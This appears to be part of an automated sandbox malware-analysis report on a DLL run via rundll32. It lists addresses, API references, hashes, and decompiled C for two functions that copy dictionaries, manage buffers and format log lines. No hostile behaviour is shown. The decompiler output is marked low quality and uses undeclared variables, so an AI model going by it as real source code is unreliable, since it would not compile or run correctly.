0x10011223
0x10011227
0x1001122b
0x1001122f
0x10011233
0x1001123f
0x10011243
0x10011346
0x00000000
0x00000000
0x10011350
0x1001135a
0x1001135e
0x00000000
0x00000000
0x00000000
0x10011249
0x1001124d
0x10011251
0x10011253
0x10011364
0x10011364
0x10011369
0x1001136b
0x1001129e
0x100112a2
0x100112a5
0x100112ae
0x100112b1
0x100112b6
0x100112cb
0x100112cb
0x10011294
0x10011298
0x10011413
0x10011416
0x1001141f
0x10011422
0x10011422
0x00000000
0x10011298
0x10011259
0x10011259
0x10011261
0x100113a0
0x100113a6
0x100113aa
0x100113ae
0x100113b6
0x100113b6
0x1001126d
0x10011380
0x10011383
0x1001138a
0x1001138e
0x10011390
0x00000000
0x00000000
0x10011394
0x00000000
0x00000000
0x00000000
0x10011273
0x10011273
0x10011279
0x100113c0
0x100113c0
0x100113c7
0x100113cc
0x100113d0
0x100113d8
0x100113da
0x100113e4
0x00000000
0x00000000
0x00000000
0x00000000
0x100113da
0x1001127f
0x10011283
0x10011289
0x100112d2
0x10011432
0x10011434
0x10011468
0x1001146a
0x100114fb
0x100114fe
0x10011507
0x1001150a
0x1001150a
0x10011474
0x10011476
0x10011479
0x00000000
0x10011479
0x1001143c
0x10011440
0x10011447
0x1001144a
0x10011451
0x10011453
0x00000000
0x00000000
0x10011459
0x1001145c
0x1001131e
0x1001131e
0x10011324
0x00000000
0x00000000
0x1001132a
0x10011332
0x10011335
0x10011337
0x10011339
0x00000000
0x10011339
0x100112de
0x100113f0
0x100113f3
0x100113f5
0x100113fe
0x10011401
0x00000000
0x10011401
0x100112e6
0x100112e9
0x100112f4
0x100112f7
0x00000000
0x10011488
0x10011488
0x1001148d
0x10011491
0x1001149a
0x1001149d
0x1001149f
0x100114a4
0x100114a9
0x100114ad
0x100114b1
0x100114b5
0x100114bc
0x00000000
0x00000000
0x100114c2
0x100114c6
0x100114c9
0x100114cd
0x100114d3
0x1001151e
0x10011540
0x10011543
0x10011544
0x10011545
0x10011548
0x10011548
0x10011526
0x1001154c
0x1001154f
0x10011552
0x10011555
0x10011558
0x10011558
0x1001152e
0x10011530
0x10011532
0x10011535
0x10011538
0x1001153b
0x1001153b
0x1001152e
0x100114d5
0x100114dd
0x100114dd
0x100114df
0x100114e2
0x100114eb
0x100112fc
0x100112ff
0x10011302
0x10011307
0x10011309
0x1001130c
0x1001130c
0x1001130f
0x10011318
0x1001131b
0x00000000
0x1001131b
0x1001128f
0x1001128f
0x1001128f
0x00000000
0x1001128f
0x10011289
0x1001126d

APIs

mv_strdup.MAIN ref: 10011353
mv_strdup.MAIN ref: 10011383
mv_dict_get.MAIN ref: 100113B1
mv_mallocz.MAIN ref: 100113C7

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_strdup$mv_dict_getmv_mallocz
String ID:
API String ID: 3834523185-0
Opcode ID: 34b8535691b7a7fadd794d32cbd0790fd03931f9f00ffb340a5a63087569dce7
Instruction ID: 095bdf82c674aaefaf2cda3429f550f943fa4cc151a1ce18d08b383c11ff4614
Opcode Fuzzy Hash: 34b8535691b7a7fadd794d32cbd0790fd03931f9f00ffb340a5a63087569dce7
Instruction Fuzzy Hash: F39127B5A087518FC754DF68C48065EBBE1FF88794F12892DED989B344E770E981CB82

Uniqueness

Uniqueness Score: -1.00%

Function 1001A6C0 Relevance: 28.8, APIs: 19, Instructions: 325
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E1001A6C0(void* __eax, void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t251;
				signed int _t259;
				void* _t262;
				signed int* _t263;
				void* _t264;
				void* _t269;
				signed int _t275;
				void* _t278;
				signed int _t290;
				signed int _t291;
				void _t293;
				void* _t294;
				signed int _t307;
				signed int _t308;
				int _t311;
				signed int _t315;
				int _t321;
				void* _t323;
				int _t324;
				void* _t327;
				void* _t330;
				void* _t332;
				void* _t333;
				signed int _t335;
				void _t337;
				void* _t338;
				signed char* _t340;
				void* _t341;
				signed short* _t342;
				void _t343;
				signed int _t344;
				void* _t345;
				void* _t346;
				void** _t347;

				_t345 = __eax;
				_t347 = _t346 - 0x4c;
				_t347[8] = __ecx;
				 *((intOrPtr*)(__eax + 0x54)) =  *((intOrPtr*)(__edx + 0x54));
				 *((intOrPtr*)(__eax + 0x5c)) =  *((intOrPtr*)(__edx + 0x5c));
				 *((intOrPtr*)(__eax + 0x60)) =  *((intOrPtr*)(__edx + 0x60));
				 *((intOrPtr*)(__eax + 0x58)) =  *((intOrPtr*)(__edx + 0x58));
				 *((intOrPtr*)(__eax + 0x130)) =  *((intOrPtr*)(__edx + 0x130));
				 *((intOrPtr*)(__eax + 0x134)) =  *((intOrPtr*)(__edx + 0x134));
				 *((intOrPtr*)(__eax + 0x138)) =  *((intOrPtr*)(__edx + 0x138));
				 *((intOrPtr*)(__eax + 0x68)) =  *((intOrPtr*)(__edx + 0x68));
				 *((intOrPtr*)(__eax + 0x6c)) =  *((intOrPtr*)(__edx + 0x6c));
				 *((intOrPtr*)(__eax + 0x13c)) =  *((intOrPtr*)(__edx + 0x13c));
				 *((intOrPtr*)(__eax + 0x170)) =  *((intOrPtr*)(__edx + 0x170));
				 *((intOrPtr*)(__eax + 0x174)) =  *((intOrPtr*)(__edx + 0x174));
				 *((intOrPtr*)(__eax + 0x90)) =  *((intOrPtr*)(__edx + 0x90));
				 *((intOrPtr*)(__eax + 0x94)) =  *((intOrPtr*)(__edx + 0x94));
				 *((intOrPtr*)(__eax + 0x98)) =  *((intOrPtr*)(__edx + 0x98));
				 *((intOrPtr*)(__eax + 0x9c)) =  *((intOrPtr*)(__edx + 0x9c));
				 *((intOrPtr*)(__eax + 0xa8)) =  *((intOrPtr*)(__edx + 0xa8));
				 *((intOrPtr*)(__eax + 0x70)) =  *((intOrPtr*)(__edx + 0x70));
				 *((intOrPtr*)(__eax + 0x74)) =  *((intOrPtr*)(__edx + 0x74));
				 *((intOrPtr*)(__eax + 0x8c)) =  *((intOrPtr*)(__edx + 0x8c));
				 *((intOrPtr*)(__eax + 0x108)) =  *((intOrPtr*)(__edx + 0x108));
				 *((intOrPtr*)(__eax + 0x10c)) =  *((intOrPtr*)(__edx + 0x10c));
				 *((intOrPtr*)(__eax + 0x124)) =  *((intOrPtr*)(__edx + 0x124));
				 *((intOrPtr*)(__eax + 0x110)) =  *((intOrPtr*)(__edx + 0x110));
				 *((intOrPtr*)(__eax + 0x114)) =  *((intOrPtr*)(__edx + 0x114));
				 *((intOrPtr*)(__eax + 0x78)) =  *((intOrPtr*)(__edx + 0x78));
				 *((intOrPtr*)(__eax + 0x7c)) =  *((intOrPtr*)(__edx + 0x7c));
				 *((intOrPtr*)(__eax + 0xa0)) =  *((intOrPtr*)(__edx + 0xa0));
				 *((intOrPtr*)(__eax + 0xa4)) =  *((intOrPtr*)(__edx + 0xa4));
				_t347[6] = __edx;
				_t304 =  *(__edx + 0x100);
				_t289 =  *(__edx + 0x104);
				 *((intOrPtr*)(__eax + 0x88)) =  *((intOrPtr*)(__edx + 0x88));
				 *(__eax + 0x100) =  *(__edx + 0x100);
				 *(__eax + 0x104) =  *(__edx + 0x104);
				 *((intOrPtr*)(__eax + 0x80)) =  *((intOrPtr*)(__edx + 0x80));
				 *((intOrPtr*)(__eax + 0x84)) =  *((intOrPtr*)(__edx + 0x84));
				 *((intOrPtr*)(__eax + 0xe8)) =  *((intOrPtr*)(__edx + 0xe8));
				 *((intOrPtr*)(__eax + 0x11c)) =  *((intOrPtr*)(__edx + 0x11c));
				 *((intOrPtr*)(__eax + 0xf0)) =  *((intOrPtr*)(__edx + 0xf0));
				 *((intOrPtr*)(__eax + 0xf4)) =  *((intOrPtr*)(__edx + 0xf4));
				 *((intOrPtr*)(__eax + 0xf8)) =  *((intOrPtr*)(__edx + 0xf8));
				 *((intOrPtr*)(__eax + 0xec)) =  *((intOrPtr*)(__edx + 0xec));
				 *((intOrPtr*)(__eax + 0xfc)) =  *((intOrPtr*)(__edx + 0xfc));
				_t347[2] = 0;
				_t347[1] =  *(__edx + 0x118);
				 *_t347 = __eax + 0x118;
				L10011D20();
				_t321 = _t347[6];
				if( *((intOrPtr*)(_t321 + 0xe4)) <= 0) {
					L31:
					_t347[6] = _t321;
					_t347[1] =  *(_t321 + 0x12c);
					 *_t347 = _t345 + 0x12c;
					_t290 = E1000A480(_t289, _t326, _t334, _t345);
					_t347[1] =  *(_t347[6] + 0x140);
					 *_t347 = _t345 + 0x140;
					return E1000A480(_t290, _t326, _t334, _t345) | _t290;
				} else {
					_t347[6] = 0;
					do {
						_t334 = _t347[6];
						_t289 =  *( *((intOrPtr*)(_t321 + 0xe0)) + _t347[6] * 4);
						_t326 =  *_t289;
						if(_t326 != 0 ||  *((intOrPtr*)(_t321 + 0x44)) ==  *((intOrPtr*)(_t345 + 0x44)) &&  *((intOrPtr*)(_t321 + 0x48)) ==  *((intOrPtr*)(_t345 + 0x48))) {
							if(_t347[8] != 0) {
								_t347[0xa] = _t321;
								 *_t347 =  *(_t289 + 8);
								_t251 = L10009DC0(_t289, _t304, _t326, _t334);
								_t347[0xf] = _t251;
								_t335 = _t251;
								if(_t251 == 0) {
									L19:
									 *_t347 =  &(_t347[0xf]);
									E1000A000(_t289, _t335);
									if( *(_t345 + 0xe4) > 0) {
										_t291 = 0;
										do {
											_t327 =  *(_t345 + 0xe0) + _t291 * 4;
											_t291 = _t291 + 1;
											_t337 =  *_t327;
											_t338 = _t337 + 0xc;
											 *_t347 = _t337 + 0x10;
											E1000A000(_t291, _t338);
											 *_t347 = _t338;
											L10011CC0();
											 *_t347 = _t327;
											E100265C0();
										} while (_t291 <  *(_t345 + 0xe4));
									}
									goto L22;
								} else {
									_t259 =  *(_t345 + 0xe4);
									if(_t259 > 0x1ffffffe) {
										goto L19;
									} else {
										_t347[1] = 4 + _t259 * 4;
										 *_t347 =  *(_t345 + 0xe0);
										_t262 = E10026280();
										if(_t262 == 0) {
											goto L19;
										} else {
											 *(_t345 + 0xe0) = _t262;
											 *_t347 = 0x14;
											_t263 = E100265E0();
											if(_t263 == 0) {
												goto L19;
											} else {
												_t263[4] = _t335;
												_t323 =  *(_t335 + 4);
												 *_t263 = _t326;
												_t263[2] =  *(_t335 + 8);
												_t307 =  *(_t345 + 0xe4);
												_t263[1] = _t323;
												_t347[0xb] = _t323;
												 *(_t345 + 0xe4) = _t307 + 1;
												 *( *(_t345 + 0xe0) + _t307 * 4) = _t263;
												_t340 =  *(_t289 + 4);
												_t347[7] =  *(_t289 + 8);
												_t330 = _t323;
												_t324 = _t347[0xa];
												_t347[9] = _t340;
												if(_t347[7] >= 8) {
													if((_t330 & 0x00000001) != 0) {
														_t308 =  *_t340 & 0x000000ff;
														_t330 = _t330 + 1;
														_t347[0xa] = _t308;
														 *(_t330 - 1) = _t308;
														_t347[7] = _t347[7] - 1;
														_t347[9] = _t347[9] + 1;
														if((_t330 & 0x00000002) != 0) {
															goto L34;
														}
													} else {
														if((_t330 & 0x00000002) != 0) {
															L34:
															_t342 = _t347[9];
															_t330 = _t330 + 2;
															 *((short*)(_t330 - 2)) =  *_t342 & 0x0000ffff;
															_t347[7] = _t347[7] - 2;
															_t347[9] =  &(_t342[1]);
														}
													}
													if((_t330 & 0x00000004) != 0) {
														_t341 = _t347[9];
														_t330 = _t330 + 4;
														 *(_t330 - 4) =  *_t341;
														_t347[7] = _t347[7] - 4;
														_t347[9] = _t341 + 4;
													}
												}
												_t334 = _t347[9];
												_t311 = _t347[7];
												_t264 = memcpy(_t330, _t334, _t311);
												_t347 =  &(_t347[3]);
												_t326 = _t334 + _t311 + _t311;
												goto L8;
											}
										}
									}
								}
							} else {
								_t347[7] = _t321;
								 *_t347 =  *(_t289 + 0x10);
								_t269 = L10009FC0(_t289, _t304);
								_t343 =  *_t289;
								_t347[0xf] = _t269;
								_t332 = _t269;
								if(_t269 == 0) {
									L23:
									 *_t347 =  &(_t347[0xf]);
									E1000A000(_t289, _t343);
									if( *(_t345 + 0xe4) > 0) {
										_t344 = _t347[8];
										do {
											_t333 =  *(_t345 + 0xe0) + _t344 * 4;
											_t344 = _t344 + 1;
											_t293 =  *_t333;
											_t294 = _t293 + 0xc;
											 *_t347 = _t293 + 0x10;
											E1000A000(_t294, _t344);
											 *_t347 = _t294;
											L10011CC0();
											 *_t347 = _t333;
											E100265C0();
										} while (_t344 <  *(_t345 + 0xe4));
									}
									L22:
									 *(_t345 + 0xe4) = 0;
									 *_t347 = _t345 + 0xe0;
									E100265C0();
									return 0xfffffff4;
								} else {
									_t275 =  *(_t345 + 0xe4);
									if(_t275 > 0x1ffffffe) {
										goto L23;
									} else {
										_t347[1] = 4 + _t275 * 4;
										 *_t347 =  *(_t345 + 0xe0);
										_t278 = E10026280();
										if(_t278 == 0) {
											goto L23;
										} else {
											 *(_t345 + 0xe0) = _t278;
											 *_t347 = 0x14;
											_t264 = E100265E0();
											if(_t264 == 0) {
												goto L23;
											} else {
												 *(_t264 + 0x10) = _t332;
												_t324 = _t347[7];
												 *((intOrPtr*)(_t264 + 4)) =  *((intOrPtr*)(_t332 + 4));
												 *_t264 = _t343;
												_t334 =  *(_t345 + 0xe0);
												 *((intOrPtr*)(_t264 + 8)) =  *((intOrPtr*)(_t332 + 8));
												_t315 =  *(_t345 + 0xe4);
												_t326 = _t315 + 1;
												 *(_t345 + 0xe4) = _t315 + 1;
												 *( *(_t345 + 0xe0) + _t315 * 4) = _t264;
												L8:
												_t347[7] = _t324;
												_t347[2] = 0;
												_t304 =  *(_t289 + 0xc);
												 *_t347 = _t264 + 0xc;
												_t347[1] =  *(_t289 + 0xc);
												L10011D20();
												_t321 = _t347[7];
												goto L9;
											}
										}
									}
								}
							}
						} else {
							goto L9;
						}
						goto L35;
						L9:
						_t347[6] = _t347[6] + 1;
					} while ( *((intOrPtr*)(_t321 + 0xe4)) > _t347[6]);
					goto L31;
				}
				L35:
			}

0x1001a6c1
0x1001a6c6
0x1001a6c9
0x1001a6d6
0x1001a6dc
0x1001a6e2
0x1001a6e8
0x1001a6f1
0x1001a6fd
0x1001a709
0x1001a715
0x1001a71e
0x1001a727
0x1001a733
0x1001a739
0x1001a73f
0x1001a751
0x1001a75d
0x1001a769
0x1001a775
0x1001a781
0x1001a78a
0x1001a793
0x1001a79f
0x1001a7ab
0x1001a7b7
0x1001a7bd
0x1001a7c6
0x1001a7cf
0x1001a7d8
0x1001a7e1
0x1001a7e7
0x1001a7f3
0x1001a7f7
0x1001a7fd
0x1001a803
0x1001a80f
0x1001a815
0x1001a81b
0x1001a827
0x1001a833
0x1001a83f
0x1001a84b
0x1001a857
0x1001a863
0x1001a86f
0x1001a87b
0x1001a883
0x1001a88d
0x1001a897
0x1001a89a
0x1001a89f
0x1001a8ab
0x1001ab88
0x1001ab88
0x1001ab92
0x1001ab9c
0x1001aba8
0x1001abb0
0x1001abba
0x1001abcb
0x1001a8b1
0x1001a8b3
0x1001a9b3
0x1001a9b9
0x1001a9bd
0x1001a9c0
0x1001a9c4
0x1001a9dc
0x1001a8c0
0x1001a8c7
0x1001a8ca
0x1001a8cf
0x1001a8d5
0x1001a8d7
0x1001aa80
0x1001aa84
0x1001aa87
0x1001aa94
0x1001aa96
0x1001aa98
0x1001aa9e
0x1001aaa1
0x1001aaa2
0x1001aaa7
0x1001aaaa
0x1001aaad
0x1001aab2
0x1001aab5
0x1001aaba
0x1001aabd
0x1001aac2
0x1001aa98
0x00000000
0x1001a8dd
0x1001a8dd
0x1001a8e8
0x00000000
0x1001a8ee
0x1001a8f5
0x1001a8ff
0x1001a902
0x1001a909
0x00000000
0x1001a90f
0x1001a90f
0x1001a915
0x1001a91c
0x1001a923
0x00000000
0x1001a929
0x1001a929
0x1001a92f
0x1001a932
0x1001a93a
0x1001a93d
0x1001a943
0x1001a946
0x1001a94d
0x1001a956
0x1001a959
0x1001a95c
0x1001a960
0x1001a962
0x1001a96b
0x1001a96f
0x1001ab46
0x1001abd0
0x1001abd3
0x1001abd4
0x1001abd8
0x1001abdf
0x1001abea
0x1001abee
0x00000000
0x00000000
0x1001ab4c
0x1001ab52
0x1001ac00
0x1001ac00
0x1001ac04
0x1001ac0a
0x1001ac11
0x1001ac16
0x1001ac16
0x1001ab52
0x1001ab5e
0x1001ab64
0x1001ab68
0x1001ab6d
0x1001ab73
0x1001ab78
0x1001ab78
0x1001ab5e
0x1001a975
0x1001a979
0x1001a97d
0x1001a97d
0x1001a97d
0x00000000
0x1001a97d
0x1001a923
0x1001a909
0x1001a8e8
0x1001a9e2
0x1001a9e2
0x1001a9e9
0x1001a9ec
0x1001a9f1
0x1001a9f3
0x1001a9f9
0x1001a9fb
0x1001aaf0
0x1001aaf4
0x1001aaf7
0x1001ab04
0x1001ab06
0x1001ab0a
0x1001ab10
0x1001ab13
0x1001ab14
0x1001ab19
0x1001ab1c
0x1001ab1f
0x1001ab24
0x1001ab27
0x1001ab2c
0x1001ab2f
0x1001ab34
0x1001ab3c
0x1001aaca
0x1001aad2
0x1001aad8
0x1001aadb
0x1001aaec
0x1001aa01
0x1001aa01
0x1001aa0c
0x00000000
0x1001aa12
0x1001aa19
0x1001aa23
0x1001aa26
0x1001aa2d
0x00000000
0x1001aa33
0x1001aa33
0x1001aa39
0x1001aa40
0x1001aa47
0x00000000
0x1001aa4d
0x1001aa4d
0x1001aa53
0x1001aa57
0x1001aa5d
0x1001aa5f
0x1001aa65
0x1001aa68
0x1001aa6e
0x1001aa71
0x1001aa77
0x1001a97f
0x1001a97f
0x1001a988
0x1001a98c
0x1001a98f
0x1001a992
0x1001a996
0x1001a99b
0x00000000
0x1001a99b
0x1001aa47
0x1001aa2d
0x1001aa0c
0x1001a9fb
0x00000000
0x00000000
0x00000000
0x00000000
0x1001a99f
0x1001a99f
0x1001a9a7
0x00000000
0x1001a9b3
0x00000000

APIs

mv_dict_copy.MAIN(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1001A89A
mv_dict_copy.MAIN ref: 1001A996
mv_buffer_ref.MAIN ref: 1001A9EC
mv_realloc.MAIN ref: 1001AA26
mv_mallocz.MAIN ref: 1001AA40
mv_buffer_replace.MAIN(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1001AB9F
mv_buffer_replace.MAIN(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1001ABBD

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_buffer_replacemv_dict_copy$mv_buffer_refmv_malloczmv_realloc
String ID:
API String ID: 1780483662-0
Opcode ID: 07b599f6d8ee219048b6128147e910c9945fa735575f1c6576c8cbb7c6ffcc6f
Instruction ID: 1c222d73e1748437048cd959b4fb099db9e50fe00274f25359b61923485b158e
Opcode Fuzzy Hash: 07b599f6d8ee219048b6128147e910c9945fa735575f1c6576c8cbb7c6ffcc6f
Instruction Fuzzy Hash: 71F1B5B49043468FC764CF29C580799BBE1FF49350F058A6EE9899B712E730E985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 10023730 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 193
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E10023730(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t100;
				signed int _t104;
				void* _t108;
				char* _t112;
				intOrPtr _t127;
				char* _t128;
				void* _t131;
				char* _t132;
				signed int _t136;
				signed int _t138;
				void* _t139;
				signed int _t142;
				signed int _t144;
				signed int _t146;
				signed int _t148;
				signed int _t150;
				signed int _t153;
				signed int _t156;
				signed int _t159;
				signed int _t162;
				signed int _t163;
				signed int _t165;
				signed int _t167;
				void* _t168;
				signed int* _t169;

				_t169 = _t168 - L1008ED80(0x103c);
				_t136 = _t169[0x414];
				if(_t136 == 0) {
					_t169[2] = 1;
					 *_t169 =  &(_t169[0xc]);
					_t169[1] = 0;
					E10008880(0, 0, 1, 1);
					_t169[2] = 1;
					_t162 =  &(_t169[0x20c]);
					_t169[1] = 0;
					_t159 =  &(_t169[0x30c]);
					 *_t169 =  &(_t169[0x10c]);
					E10008880(0, _t159, _t162, 1);
					_t169[1] = 0;
					_t169[2] = 1;
					 *_t169 = _t162;
					E10008880(0, _t159, _t162, 1);
					_t169[2] = 0x10000;
					_t169[1] = 0;
					 *_t169 = _t159;
					E10008880(0, _t159, _t162, 1);
					_t100 =  *(_t169[0x41a]) & 0xffffff00 |  *(_t169[0x41a]) != 0x00000000;
					L8:
					if(_t169[0x415] >= 0xfffffff9 && _t100 != 0 && ( *0x100d568c & 0x00000002) != 0) {
						_t67 = _t169[0x415] + 8; // 0x101
						_t153 = _t67;
						_t112 = 0x100b367b;
						if(_t153 <= 0x40) {
							_t112 =  *(0x100b3880 + _t153 * 4);
						}
						_t169[2] = _t112;
						_t169[1] = "[%s] ";
						 *_t169 = _t162;
						L100089C0();
					}
					 *_t169 = _t159;
					_t169[2] = _t169[0x417];
					_t169[1] = _t169[0x416];
					L10008B70();
					_t104 = _t169[0xc];
					_t142 = _t169[0x10c];
					_t163 = _t169[0x20c];
					_t138 = _t169[0x30c];
					if( *_t104 != 0 ||  *_t142 != 0 ||  *_t163 != 0) {
						L12:
						_t165 = _t169[0x30d];
						_t148 = 0;
						if(_t165 != 0 && _t169[0x30e] >= _t165) {
							_t150 =  *(_t138 + _t165 - 1) & 0x000000ff;
							_t169[0xa] = _t150 == 0xa;
							_t148 = (_t150 & 0xffffff00 | _t150 == 0x0000000d | _t169[0xa]) & 0x000000ff;
						}
						 *(_t169[0x41a]) = _t148;
						goto L16;
					} else {
						if( *_t138 == 0) {
							L16:
							_t169[3] = _t104;
							_t169[2] = "%s%s%s%s";
							_t169[6] = _t138;
							_t169[5] = _t163;
							_t169[4] = _t142;
							_t169[1] = _t169[0x419];
							 *_t169 = _t169[0x418];
							_t108 = L10022FC0();
							 *_t169 = _t159;
							_t169[1] = 0;
							_t139 = _t108;
							E10009690(_t139, _t142, _t159, _t163);
							return _t139;
						}
						goto L12;
					}
				}
				_t169[2] = 1;
				_t167 =  &(_t169[0x10c]);
				_t169[1] = 0;
				 *_t169 =  &(_t169[0xc]);
				_t162 =  &(_t169[0x20c]);
				_t169[0xa] =  *_t136;
				E10008880(_t136, 0x10000, _t162, _t167);
				_t169[2] = 1;
				_t169[1] = 0;
				 *_t169 = _t167;
				E10008880(_t136, 0x10000, _t162, _t167);
				_t169[2] = 1;
				_t169[1] = 0;
				 *_t169 = _t162;
				E10008880(_t136, 0x10000, _t162, _t167);
				_t169[2] = 0x10000;
				_t159 =  &(_t169[0x30c]);
				_t169[1] = 0;
				 *_t169 = _t159;
				E10008880(_t136, _t159, _t162, _t167);
				_t156 = _t169[0xa];
				_t144 = 0 |  *(_t169[0x41a]) != 0x00000000;
				_t100 = _t144;
				if(_t156 != 0 && _t144 != 0) {
					_t127 =  *((intOrPtr*)(_t156 + 0x14));
					if(_t127 != 0) {
						_t146 =  *(_t136 + _t127);
						if(_t146 != 0) {
							_t131 =  *_t146;
							if(_t131 != 0) {
								 *_t169 = _t146;
								_t169[0xb] = _t156;
								_t169[0xa] = _t146;
								_t132 =  *((intOrPtr*)(_t131 + 4))();
								_t169[3] = _t169[0xa];
								_t169[2] = _t132;
								_t169[1] = "[%s @ %p] ";
								 *_t169 =  &(_t169[0xc]);
								L100089C0();
								_t156 = _t169[0xb];
							}
						}
					}
					 *_t169 = _t136;
					_t128 =  *((intOrPtr*)(_t156 + 4))();
					_t169[3] = _t136;
					_t169[1] = "[%s @ %p] ";
					 *_t169 = _t167;
					_t169[2] = _t128;
					L100089C0();
					_t100 = _t169[0x41a] & 0xffffff00 |  *(_t169[0x41a]) != 0x00000000;
				}
			}

0x1002373e
0x10023740
0x10023749
0x100239a7
0x100239b1
0x100239be
0x100239c2
0x100239ce
0x100239d2
0x100239d9
0x100239dd
0x100239e4
0x100239e7
0x100239ee
0x100239f2
0x100239f6
0x100239f9
0x10023a03
0x10023a09
0x10023a0d
0x10023a10
0x10023a20
0x1002385a
0x10023862
0x1002396c
0x1002396c
0x1002396f
0x10023977
0x10023979
0x10023979
0x10023980
0x10023989
0x1002398d
0x10023990
0x10023990
0x1002386c
0x10023876
0x10023881
0x10023885
0x1002388a
0x1002388e
0x10023895
0x1002389c
0x100238a6
0x100238b1
0x100238b1
0x100238b8
0x100238bc
0x100238c7
0x100238cf
0x100238de
0x100238de
0x100238e8
0x00000000
0x10023949
0x1002394c
0x100238eb
0x100238eb
0x100238f4
0x100238ff
0x10023903
0x10023907
0x1002390b
0x10023916
0x10023919
0x10023920
0x10023923
0x10023927
0x10023929
0x1002393a
0x1002393a
0x00000000
0x10023950
0x100238a6
0x1002375b
0x1002375f
0x10023768
0x10023770
0x10023773
0x1002377a
0x1002377e
0x10023788
0x1002378e
0x10023792
0x10023795
0x100237a1
0x100237a5
0x100237a9
0x100237ac
0x100237b3
0x100237b7
0x100237be
0x100237c2
0x100237c5
0x100237d1
0x100237d9
0x100237de
0x100237e0
0x100237e6
0x100237eb
0x100237ed
0x100237f2
0x100237f4
0x100237f8
0x100237fa
0x100237fd
0x10023801
0x10023805
0x1002380c
0x10023810
0x10023819
0x10023821
0x10023824
0x10023829
0x10023829
0x100237f8
0x100237f2
0x1002382d
0x10023830
0x10023838
0x1002383c
0x10023840
0x10023843
0x10023847
0x10023857
0x10023857

APIs

mv_bprint_init.MAIN ref: 1002377E
mv_bprint_init.MAIN ref: 10023795
mv_bprint_init.MAIN ref: 100237AC
mv_bprint_init.MAIN ref: 100237C5
mv_bprintf.MAIN ref: 10023824
mv_bprintf.MAIN ref: 10023847
mv_vbprintf.MAIN ref: 10023885
mv_bprint_finalize.MAIN ref: 10023929
mv_bprint_init.MAIN ref: 100239C2
mv_bprint_init.MAIN ref: 100239E7
mv_bprint_init.MAIN ref: 100239F9
mv_bprint_init.MAIN ref: 10023A10

Strings

[%s] , xrefs: 10023984
[%s @ %p] , xrefs: 10023814, 10023833
%s%s%s%s, xrefs: 100238EF

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprint_init$mv_bprintf$mv_bprint_finalizemv_vbprintf
String ID: %s%s%s%s$[%s @ %p] $[%s]
API String ID: 2514531573-1798253436
Opcode ID: 73ec329c920999803a4babe89b4941ef9f254048450b1a5a3304028e830a3db2
Instruction ID: 6f949b97a94191d98c9e239c908f2f64f0d76179adbd4d945766b856959e5812
Opcode Fuzzy Hash: 73ec329c920999803a4babe89b4941ef9f254048450b1a5a3304028e830a3db2
Instruction Fuzzy Hash: 5F8106B49097809FD354DF28D08069BBBE5FF89380F95C92EF8C88B315DA749984CB42

Uniqueness

Uniqueness Score: -1.00%

Function 1002D230 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 128stringCOMMON

